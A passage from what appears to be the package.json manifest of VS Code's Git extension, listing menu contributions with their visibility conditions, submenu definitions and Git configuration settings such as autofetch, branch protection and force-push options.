scmArtifactGroupId == worktrees"}],"scm/resourceGroup/context":[{"command":"git.stageAllMerge","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"git.stageAllMerge","when":"scmProvider == git && scmResourceGroup == merge","group":"inline@2"},{"command":"git.unstageAll","when":"scmProvider == git && scmResourceGroup == index","group":"1_modification"},{"command":"git.unstageAll","when":"scmProvider == git && scmResourceGroup == index","group":"inline@2"},{"command":"git.viewStagedChanges","when":"scmProvider == git && scmResourceGroup == index","group":"inline@1"},{"command":"git.viewChanges","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline@1"},{"command":"git.cleanAll","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges == mixed","group":"1_modification"},{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges == mixed","group":"1_modification"},{"command":"git.cleanAll","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges == mixed","group":"inline@2"},{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges == mixed","group":"inline@2"},{"command":"git.cleanAllTracked","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges != mixed","group":"1_modification"},{"command":"git.stageAllTracked","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges != mixed","group":"1_modification"},{"command":"git.cleanAllTracked","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges != mixed","group":"inline@2"},{"command":"git.stageAllTracked","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.untrackedChanges != mixed","group":"inline@2"},{"command":"git.cleanAllUntracked","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification"},{"command":"git.stageAllUntracked","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification"},{"command":"git.viewUntrackedChanges","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@1"},{"command":"git.cleanAllUntracked","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@2"},{"command":"git.stageAllUntracked","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@2"}],"scm/resourceFolder/context":[{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"inline@2"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"1_modification"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"inline@2"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline@2"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline@2"},{"command":"git.ignore","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification@3"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@2"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@2"},{"command":"git.ignore","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification@3"}],"scm/resourceState/context":[{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == merge","group":"navigation"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"inline@2"},{"command":"git.revealFileInOS.linux","when":"scmProvider == git && scmResourceGroup == merge && remoteName == '' && isLinux","group":"2_view@1"},{"command":"git.revealFileInOS.mac","when":"scmProvider == git && scmResourceGroup == merge && remoteName == '' && isMac","group":"2_view@1"},{"command":"git.revealFileInOS.windows","when":"scmProvider == git && scmResourceGroup == merge && remoteName == '' && isWindows","group":"2_view@1"},{"command":"git.revealInExplorer","when":"scmProvider == git && scmResourceGroup == merge","group":"2_view@2"},{"command":"git.openFile2","when":"scmProvider == git && scmResourceGroup == merge && config.git.showInlineOpenFileAction && config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == merge && config.git.showInlineOpenFileAction && !config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.openHEADFile","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"1_modification"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"inline@2"},{"command":"git.revealFileInOS.linux","when":"scmProvider == git && scmResourceGroup == index && remoteName == '' && isLinux","group":"2_view@1"},{"command":"git.revealFileInOS.mac","when":"scmProvider == git && scmResourceGroup == index && remoteName == '' && isMac","group":"2_view@1"},{"command":"git.revealFileInOS.windows","when":"scmProvider == git && scmResourceGroup == index && remoteName == '' && isWindows","group":"2_view@1"},{"command":"git.revealInExplorer","when":"scmProvider == git && scmResourceGroup == index","group":"2_view@2"},{"command":"git.compareWithWorkspace","when":"scmProvider == git && scmResourceGroup == index && scmResourceState == worktree","group":"worktree_diff"},{"command":"git.openFile2","when":"scmProvider == git && scmResourceGroup == index && config.git.showInlineOpenFileAction && config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == index && config.git.showInlineOpenFileAction && !config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.openHEADFile","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline@2"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline@2"},{"command":"git.compareWithWorkspace","when":"scmProvider == git && scmResourceGroup == workingTree && scmResourceState == worktree","group":"worktree_diff"},{"command":"git.openFile2","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.showInlineOpenFileAction && config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == workingTree && config.git.showInlineOpenFileAction && !config.git.openDiffOnClick","group":"inline@1"},{"command":"git.ignore","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification@3"},{"command":"git.revealFileInOS.linux","when":"scmProvider == git && scmResourceGroup == workingTree && remoteName == '' && isLinux","group":"2_view@1"},{"command":"git.revealFileInOS.mac","when":"scmProvider == git && scmResourceGroup == workingTree && remoteName == '' && isMac","group":"2_view@1"},{"command":"git.revealFileInOS.windows","when":"scmProvider == git && scmResourceGroup == workingTree && remoteName == '' && isWindows","group":"2_view@1"},{"command":"git.revealInExplorer","when":"scmProvider == git && scmResourceGroup == workingTree","group":"2_view@2"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == untracked","group":"navigation"},{"command":"git.openHEADFile","when":"scmProvider == git && scmResourceGroup == untracked","group":"navigation"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == untracked","group":"navigation"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == untracked && !gitFreshRepository","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == untracked && !gitFreshRepository","group":"inline@2"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == untracked","group":"inline@2"},{"command":"git.openFile2","when":"scmProvider == git && scmResourceGroup == untracked && config.git.showInlineOpenFileAction && config.git.openDiffOnClick","group":"inline@1"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == untracked && config.git.showInlineOpenFileAction && !config.git.openDiffOnClick","group":"inline@1"},{"command":"git.ignore","when":"scmProvider == git && scmResourceGroup == untracked","group":"1_modification@3"}],"scm/history/title":[{"command":"git.fetchAll","group":"navigation@900","when":"scmProvider == git"},{"command":"git.pullRef","group":"navigation@901","when":"scmProvider == git"},{"command":"git.pushRef","when":"scmProvider == git && scmCurrentHistoryItemRefHasRemote","group":"navigation@902"},{"command":"git.publish","when":"scmProvider == git && !scmCurrentHistoryItemRefHasRemote","group":"navigation@903"}],"scm/historyItem/context":[{"command":"git.graph.checkoutDetached","when":"scmProvider == git","group":"1_checkout@2"},{"command":"git.branch","when":"scmProvider == git","group":"2_branch@2"},{"command":"git.createTag","when":"scmProvider == git","group":"3_tag@1"},{"command":"git.graph.cherryPick","when":"scmProvider == git","group":"4_modify@1"},{"command":"git.graph.compareWithRemote","when":"scmProvider == git","group":"5_compare@1"},{"command":"git.graph.compareWithMergeBase","when":"scmProvider == git","group":"5_compare@2"},{"command":"git.graph.compareRef","when":"scmProvider == git","group":"5_compare@3"},{"command":"git.copyCommitId","when":"scmProvider == git && !listMultiSelection","group":"9_copy@1"},{"command":"git.copyCommitMessage","when":"scmProvider == git && !listMultiSelection","group":"9_copy@2"}],"scm/historyItemRef/context":[{"command":"git.graph.checkout","when":"scmProvider == git","group":"1_checkout@1"},{"command":"git.graph.deleteBranch","when":"scmProvider == git && scmHistoryItemRef =~ /^refs\\/heads\\/|^refs\\/remotes\\//","group":"2_branch@2"},{"command":"git.graph.deleteTag","when":"scmProvider == git && scmHistoryItemRef =~ /^refs\\/tags\\//","group":"3_tag@2"}],"editor/title":[{"command":"git.openFile","group":"navigation","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && resourceScheme =~ /^git$|^file$/"},{"command":"git.openFile","group":"navigation","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInNotebookTextDiffEditor && resourceScheme =~ /^git$|^file$/"},{"command":"git.openFile","group":"navigation","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && !isInDiffEditor && !isInNotebookTextDiffEditor && resourceScheme == git"},{"command":"git.openChange","group":"navigation@2","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && !isInDiffEditor && !isMergeEditor && resourceScheme == file && scmActiveResourceHasChanges"},{"command":"git.stashApplyEditor","alt":"git.stashPopEditor","group":"navigation@1","when":"config.git.enabled && !git.missing && resourceScheme == git-stash"},{"command":"git.stashDropEditor","group":"navigation@2","when":"config.git.enabled && !git.missing && resourceScheme == git-stash"},{"command":"git.stage","group":"2_git@1","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && !isInDiffEditor && !isMergeEditor && resourceScheme == file && git.activeResourceHasUnstagedChanges"},{"command":"git.unstage","group":"2_git@2","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && !isInDiffEditor && !isMergeEditor && resourceScheme == file && git.activeResourceHasStagedChanges"},{"command":"git.stage","group":"2_git@1","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == file"},{"command":"git.stageSelectedRanges","group":"2_git@2","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == file"},{"command":"git.unstage","group":"2_git@3","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == git"},{"command":"git.unstageSelectedRanges","group":"2_git@4","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == git"},{"command":"git.revertSelectedRanges","group":"2_git@5","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == file"}],"editor/context":[{"command":"git.stageSelectedRanges","group":"2_git@1","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == file"},{"command":"git.unstageSelectedRanges","group":"2_git@2","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == git"},{"command":"git.revertSelectedRanges","group":"2_git@3","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && isInDiffEditor && isInDiffRightEditor && !isEmbeddedDiffEditor && resourceScheme == file"}],"editor/content":[{"command":"git.acceptMerge","when":"isMergeResultEditor && mergeEditorBaseUri =~ /^(git|file):/ && mergeEditorResultUri in git.mergeChanges"},{"command":"git.openMergeEditor","group":"navigation@-10","when":"config.git.enabled && !git.missing && !isInDiffEditor && !isMergeEditor && resource in git.mergeChanges && git.activeResourceHasMergeConflicts"},{"command":"git.commitMessageAccept","group":"navigation","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && editorLangId == git-commit"},{"command":"git.commitMessageDiscard","group":"secondary","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && editorLangId == git-commit"}],"multiDiffEditor/resource/title":[{"command":"git.stageFile","group":"navigation","when":"scmProvider == git && scmResourceGroup == workingTree"},{"command":"git.stageFile","group":"navigation","when":"scmProvider == git && scmResourceGroup == untracked"},{"command":"git.unstageFile","group":"navigation","when":"scmProvider == git && scmResourceGroup == index"}],"diffEditor/gutter/hunk":[{"command":"git.diff.stageHunk","group":"primary@10","when":"diffEditorOriginalUri =~ /^git\\:.*%22ref%22%3A%22~%22%7D$/"}],"diffEditor/gutter/selection":[{"command":"git.diff.stageSelection","group":"primary@10","when":"diffEditorOriginalUri =~ /^git\\:.*%22ref%22%3A%22~%22%7D$/"}],"scm/change/title":[{"command":"git.stageChange","when":"config.git.enabled && !git.missing && originalResource =~ /^git\\:.*%22ref%22%3A%22%22%7D$/"},{"command":"git.revertChange","when":"config.git.enabled && !git.missing && originalResource =~ /^git\\:.*%22ref%22%3A%22%22%7D$/"},{"command":"git.unstageChange","when":"false"}],"timeline/item/context":[{"command":"git.timeline.viewCommit","group":"inline","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file:commit\\b/ && !listMultiSelection"},{"command":"git.timeline.openDiff","group":"1_actions@1","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file\\b/ && !listMultiSelection"},{"command":"git.timeline.viewCommit","group":"1_actions@2","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file:commit\\b/ && !listMultiSelection"},{"command":"git.timeline.compareWithSelected","group":"3_compare@1","when":"config.git.enabled && !git.missing && git.timeline.selectedForCompare && timelineItem =~ /git:file\\b/ && !listMultiSelection"},{"command":"git.timeline.selectForCompare","group":"3_compare@2","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file\\b/ && !listMultiSelection"},{"command":"git.timeline.copyCommitId","group":"5_copy@1","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file:commit\\b/ && !listMultiSelection"},{"command":"git.timeline.copyCommitMessage","group":"5_copy@2","when":"config.git.enabled && !git.missing && timelineItem =~ /git:file:commit\\b/ && !listMultiSelection"}],"git.commit":[{"command":"git.commit","group":"1_commit@1"},{"command":"git.commitStaged","group":"1_commit@2"},{"command":"git.commitAll","group":"1_commit@3"},{"command":"git.undoCommit","group":"1_commit@4"},{"command":"git.rebaseAbort","group":"1_commit@5"},{"command":"git.commitNoVerify","group":"2_commit_noverify@1","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitStagedNoVerify","group":"2_commit_noverify@2","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitAllNoVerify","group":"2_commit_noverify@3","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitAmend","group":"3_amend@1"},{"command":"git.commitStagedAmend","group":"3_amend@2"},{"command":"git.commitAllAmend","group":"3_amend@3"},{"command":"git.commitAmendNoVerify","group":"4_amend_noverify@1","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitStagedAmendNoVerify","group":"4_amend_noverify@2","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitAllAmendNoVerify","group":"4_amend_noverify@3","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitSigned","group":"5_signoff@1"},{"command":"git.commitStagedSigned","group":"5_signoff@2"},{"command":"git.commitAllSigned","group":"5_signoff@3"},{"command":"git.commitSignedNoVerify","group":"6_signoff_noverify@1","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitStagedSignedNoVerify","group":"6_signoff_noverify@2","when":"config.git.allowNoVerifyCommit"},{"command":"git.commitAllSignedNoVerify","group":"6_signoff_noverify@3","when":"config.git.allowNoVerifyCommit"}],"git.changes":[{"command":"git.stageAll","group":"changes@1"},{"command":"git.unstageAll","group":"changes@2"},{"command":"git.cleanAll","group":"changes@3"}],"git.pullpush":[{"command":"git.sync","group":"1_sync@1"},{"command":"git.syncRebase","when":"gitState == idle","group":"1_sync@2"},{"command":"git.pull","group":"2_pull@1"},{"command":"git.pullRebase","group":"2_pull@2"},{"command":"git.pullFrom","group":"2_pull@3"},{"command":"git.push","group":"3_push@1"},{"command":"git.pushForce","when":"config.git.allowForcePush","group":"3_push@2"},{"command":"git.pushTo","group":"3_push@3"},{"command":"git.pushToForce","when":"config.git.allowForcePush","group":"3_push@4"},{"command":"git.fetch","group":"4_fetch@1"},{"command":"git.fetchPrune","group":"4_fetch@2"},{"command":"git.fetchAll","group":"4_fetch@3"}],"git.branch":[{"command":"git.merge","group":"1_merge@1"},{"command":"git.rebase","group":"1_merge@2"},{"command":"git.branch","group":"2_branch@1"},{"command":"git.branchFrom","group":"2_branch@2"},{"command":"git.renameBranch","group":"3_modify@1"},{"command":"git.deleteBranch","group":"3_modify@2"},{"command":"git.deleteRemoteBranch","group":"3_modify@3"},{"command":"git.publish","group":"4_publish@1"}],"git.remotes":[{"command":"git.addRemote","group":"remote@1"},{"command":"git.removeRemote","group":"remote@2"}],"git.stash":[{"command":"git.stash","group":"1_stash@1"},{"command":"git.stashIncludeUntracked","group":"1_stash@2"},{"command":"git.stashStaged","when":"gitVersion2.35","group":"1_stash@3"},{"command":"git.stashApplyLatest","group":"2_apply@1"},{"command":"git.stashApply","group":"2_apply@2"},{"command":"git.stashPopLatest","group":"3_pop@1"},{"command":"git.stashPop","group":"3_pop@2"},{"command":"git.stashDrop","group":"4_drop@1"},{"command":"git.stashDropAll","group":"4_drop@2"},{"command":"git.stashView","group":"5_preview@1"}],"git.repositories.stash":[{"command":"git.stash","group":"1_stash@1"},{"command":"git.stashStaged","when":"gitVersion2.35","group":"2_stash@1"},{"command":"git.stashIncludeUntracked","group":"2_stash@2"}],"git.tags":[{"command":"git.createTag","group":"1_tags@1"},{"command":"git.deleteTag","group":"1_tags@2"},{"command":"git.deleteRemoteTag","group":"1_tags@3"},{"command":"git.pushTags","group":"2_tags@1"}],"git.worktrees":[{"when":"scmProviderContext == worktree","command":"git.openWorktree","group":"openWorktrees@1"},{"when":"scmProviderContext == worktree","command":"git.openWorktreeInNewWindow","group":"openWorktrees@2"},{"when":"scmProviderContext == repository","command":"git.createWorktree","group":"worktrees@1"},{"when":"scmProviderContext == worktree","command":"git.deleteWorktree2","group":"worktrees@2"}]},"submenus":[{"id":"git.commit","label":"Commit"},{"id":"git.changes","label":"Changes"},{"id":"git.pullpush","label":"Pull, Push"},{"id":"git.branch","label":"Branch"},{"id":"git.remotes","label":"Remote"},{"id":"git.stash","label":"Stash"},{"id":"git.tags","label":"Tags"},{"id":"git.worktrees","label":"Worktrees"},{"id":"git.repositories.stash","label":"Stash","icon":"$(plus)"}],"configuration":{"title":"Git","properties":{"git.enabled":{"type":"boolean","scope":"resource","description":"Whether Git is enabled.","default":true},"git.path":{"type":["string","null","array"],"markdownDescription":"Path and filename of the git executable, e.g. `C:\\Program Files\\Git\\bin\\git.exe` (Windows). This can also be an array of string values containing multiple paths to look up.","default":null,"scope":"machine"},"git.autoRepositoryDetection":{"type":["boolean","string"],"enum":[true,false,"subFolders","openEditors"],"enumDescriptions":["Scan for both subfolders of the current opened folder and parent folders of open files.","Disable automatic repository scanning.","Scan for subfolders of the currently opened folder.","Scan for parent folders of open files."],"description":"Configures when repositories should be automatically detected.","default":true},"git.autorefresh":{"type":"boolean","description":"Whether auto refreshing is enabled.","default":true},"git.autofetch":{"type":["boolean","string"],"enum":[true,false,"all"],"scope":"resource","markdownDescription":"When set to true, commits will automatically be fetched from the default remote of the current Git repository. Setting to `all` will fetch from all remotes.","default":false,"tags":["usesOnlineServices"]},"git.autofetchPeriod":{"type":"number","scope":"resource","markdownDescription":"Duration in seconds between each automatic git fetch, when `#git.autofetch#` is enabled.","default":180},"git.defaultBranchName":{"type":"string","markdownDescription":"The name of the default branch (example: main, trunk, development) when initializing a new Git repository. When set to empty, the default branch name configured in Git will be used. **Note:** Requires Git version `2.28.0` or later.","default":"main","scope":"resource"},"git.branchPrefix":{"type":"string","description":"Prefix used when creating a new branch.","default":"","scope":"resource"},"git.branchProtection":{"type":"array","markdownDescription":"List of protected branches. By default, a prompt is shown before changes are committed to a protected branch. The prompt can be controlled using the `#git.branchProtectionPrompt#` setting.","items":{"type":"string"},"default":[],"scope":"resource"},"git.branchProtectionPrompt":{"type":"string","description":"Controls whether a prompt is being shown before changes are committed to a protected branch.","enum":["alwaysCommit","alwaysCommitToNewBranch","alwaysPrompt"],"enumDescriptions":["Always commit changes to the protected branch.","Always commit changes to a new branch.","Always prompt before changes are committed to a protected branch."],"default":"alwaysPrompt","scope":"resource"},"git.branchValidationRegex":{"type":"string","description":"A regular expression to validate new branch names.","default":""},"git.branchWhitespaceChar":{"type":"string","description":"The character to replace whitespace in new branch names, and to separate segments of a randomly generated branch name.","default":"-"},"git.branchRandomName.enable":{"type":"boolean","description":"Controls whether a random name is generated when creating a new branch.","default":false,"scope":"resource"},"git.branchRandomName.dictionary":{"type":"array","markdownDescription":"List of dictionaries used for the randomly generated branch name. Each value represents the dictionary used to generate the segment of the branch name. Supported dictionaries: `adjectives`, `animals`, `colors` and `numbers`.","items":{"type":"string","enum":["adjectives","animals","colors","numbers"],"enumDescriptions":["A random adjective","A random animal name","A random color name","A random number between 100 and 999"]},"minItems":1,"maxItems":5,"default":["adjectives","animals"],"scope":"resource"},"git.confirmSync":{"type":"boolean","description":"Confirm before synchronizing Git repositories.","default":true},"git.countBadge":{"type":"string","enum":["all","tracked","off"],"enumDescriptions":["Count all changes.","Count only tracked changes.","Turn off counter."],"description":"Controls the Git count badge.","default":"all","scope":"resource"},"git.checkoutType":{"type":"array","items":{"type":"string","enum":["local","tags","remote"],"enumDescriptions":["Local branches","Tags","Remote branches"]},"uniqueItems":true,"markdownDescription":"Controls what type of Git refs are listed when running `Checkout to...`.","default":["local","remote","tags"]},"git.ignoreLegacyWarning":{"type":"boolean","description":"Ignores the legacy Git warning.","default":false},"git.ignoreMissingGitWarning":{"type":"boolean","description":"Ignores the warning when Git is missing.","default":false},"git.ignoreWindowsGit27Warning":{"type":"boolean","description":"Ignores the warning when Git 2.25 - 2.26 is installed on Windows.","default":false},"git.ignoreLimitWarning":{"type":"boolean","description":"Ignores the warning when there are too many changes in a repository.","default":false},"git.ignoreRebaseWarning":{"type":"boolean","description":"Ignores the warning when it looks like the branch might have been rebased when pulling.","default":false},"git.defaultCloneDirectory":{"type":["string","null"],"default":null,"scope":"machine","description":"The default location to clone a Git repository."},"git.useEditorAsCommitInput":{"type":"boolean","description":"Controls whether a full text editor will be used to author commit messages, whenever no message is provided in the commit input box.","default":true},"git.verboseCommit":{"type":"boolean","scope":"resource","markdownDescription":"Enable verbose output when `#git.useEditorAsCommitInput#` is enabled.","default":false},"git.enableSmartCommit":{"type":"boolean","scope":"resource","description":"Commit all changes when there are no staged changes.","default":false},"git.smartCommitChanges":{"type":"string","enum":["all","tracked"],"enumDescriptions":["Automatically stage all changes.","Automatically stage tracked changes only."],"scope":"resource","description":"Control which changes are automatically staged by Smart Commit.","default":"all"},"git.suggestSmartCommit":{"type":"boolean","scope":"resource","description":"Suggests to enable smart commit (commit all changes when there are no staged changes).","default":true},"git.enableCommitSigning":{"type":"boolean","scope":"resource","description":"Enables commit signing with GPG, X.509, or SSH.","default":false},"git.confirmEmptyCommits":{"type":"boolean","scope":"resource","description":"Always confirm the creation of empty commits for the 'Git: Commit Empty' command.","default":true},"git.decorations.enabled":{"type":"boolean","default":true,"description":"Controls whether Git contributes colors and badges to the Explorer and the Open Editors view."},"git.enableStatusBarSync":{"type":"boolean","default":true,"description":"Controls whether the Git Sync command appears in the status bar.","scope":"resource"},"git.followTagsWhenSync":{"type":"boolean","scope":"resource","default":false,"description":"Push all annotated tags when running the sync command."},"git.replaceTagsWhenPull":{"type":"boolean","scope":"resource","default":false,"description":"Automatically replace the local tags with the remote tags in case of a conflict when running the pull command."},"git.promptToSaveFilesBeforeStash":{"type":"string","enum":["always","staged","never"],"enumDescriptions":["Check for any unsaved files.","Check only for unsaved staged files.","Disable this check."],"scope":"resource","default":"always","description":"Controls whether Git should check for unsaved files before stashing changes."},"git.promptToSaveFilesBeforeCommit":{"type":"string","enum":["always","staged","never"],"enumDescriptions":["Check for any unsaved files.","Check only for unsaved staged files.","Disable this check."],"scope":"resource","default":"always","description":"Controls whether Git should check for unsaved files before committing."},"git.postCommitCommand":{"type":"string","enum":["none","push","sync"],"enumDescriptions":["Don't run any command after a commit.","Run 'git push' after a successful commit.","Run 'git pull' and 'git push' after a successful commit."],"markdownDescription":"Run a git command after a successful commit.","scope":"resource","default":"none"},"git.rememberPostCommitCommand":{"type":"boolean","description":"Remember the last git command that ran after a commit.","scope":"resource","default":false},"git.openAfterClone":{"type":"string","enum":["always","alwaysNewWindow","whenNoFolderOpen","prompt"],"enumDescriptions":["Always open in current window.","Always open in a new window.","Only open in current window when no folder is opened.","Always prompt for action."],"default":"prompt","description":"Controls whether to open a repository automatically after cloning."},"git.showInlineOpenFileAction":{"type":"boolean","default":true,"description":"Controls whether to show an inline Open File action in the Git changes view."},"git.showPushSuccessNotification":{"type":"boolean","description":"Controls whether to show a notification when a push is successful.","default":false},"git.inputValidation":{"type":"boolean","default":false,"description":"Controls whether to show commit message input validation diagnostics."},"git.inputValidationLength":{"type":"number","default":72,"description":"Controls the commit message length threshold for showing a warning."},"git.inputValidationSubjectLength":{"type":["number","null"],"default":50,"markdownDescription":"Controls the commit message subject length threshold for showing a warning. Unset it to inherit the value of `#git.inputValidationLength#`."},"git.detectSubmodules":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to automatically detect Git submodules."},"git.detectSubmodulesLimit":{"type":"number","scope":"resource","default":10,"description":"Controls the limit of Git submodules detected."},"git.detectWorktrees":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to automatically detect Git worktrees."},"git.detectWorktreesLimit":{"type":"number","scope":"resource","default":50,"description":"Controls the limit of Git worktrees detected."},"git.alwaysShowStagedChangesResourceGroup":{"type":"boolean","scope":"resource","default":false,"description":"Always show the Staged Changes resource group."},"git.alwaysSignOff":{"type":"boolean","scope":"resource","default":false,"description":"Controls the signoff flag for all commits."},"git.ignoreSubmodules":{"type":"boolean","scope":"resource","default":false,"description":"Ignore modifications to submodules in the file tree."},"git.ignoredRepositories":{"type":"array","items":{"type":"string"},"default":[],"scope":"window","description":"List of Git repositories to ignore."},"git.scanRepositories":{"type":"array","items":{"type":"string"},"default":[],"scope":"resource","description":"List of paths to search for Git repositories in."},"git.showProgress":{"type":"boolean","description":"Controls whether Git actions should show progress.","default":true,"scope":"resource"},"git.rebaseWhenSync":{"type":"boolean","scope":"resource","default":false,"description":"Force Git to use rebase when running the sync command."},"git.pullBeforeCheckout":{"type":"boolean","scope":"resource","default":false,"description":"Controls whether a branch that does not have outgoing commits is fast-forwarded before it is checked out."},"git.fetchOnPull":{"type":"boolean","scope":"resource","default":false,"description":"When enabled, fetch all branches when pulling. Otherwise, fetch just the current one."},"git.pruneOnFetch":{"type":"boolean","scope":"resource","default":false,"description":"Prune when fetching."},"git.pullTags":{"type":"boolean","scope":"resource","default":true,"description":"Fetch all tags when pulling."},"git.autoStash":{"type":"boolean","scope":"resource","default":false,"description":"Stash any changes before pulling and restore them after successful pull."},"git.allowForcePush":{"type":"boolean","default":false,"description":"Controls whether force push (with or without lease) is enabled."},"git.useForcePushWithLease":{"type":"boolean","default":true,"description":"Controls whether force pushing uses the safer force-with-lease variant."},"git.useForcePushIfIncludes":{"type":"boolean","default":true,"markdownDescription":"Controls whether force pushing uses the safer force-if-includes variant. Note: This setting requires the `#git.useForcePushWithLease#` setting to be enabled, and Git version `2.30.0` or later."},"git.confirmForcePush":{"type":"boolean","default":true,"description":"Controls whether to ask for confirmation before force-pushing."},"git.allowNoVerifyCommit":{"type":"boolean","default":false,"description":"Controls whether commits without running pre-commit and commit-msg hooks are allowed."},"git.confirmNoVerifyCommit":{"type":"boolean","default":true,"description":"Controls whether to ask for confirmation before committing without verification."},"git.closeDiffOnOperation":{"type":"boolean","scope":"resource","default":false,"description":"Controls whether the diff editor should be automatically closed when changes are stashed, committed, discarded, staged, or unstaged."},"git.openDiffOnClick":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether the diff editor should be opened when clicking a change. Otherwise the regular editor will be opened."},"git.supportCancellation":{"type":"boolean","scope":"resource","default":false,"description":"Controls whether a notification comes up when running the Sync action, which allows the user to cancel the 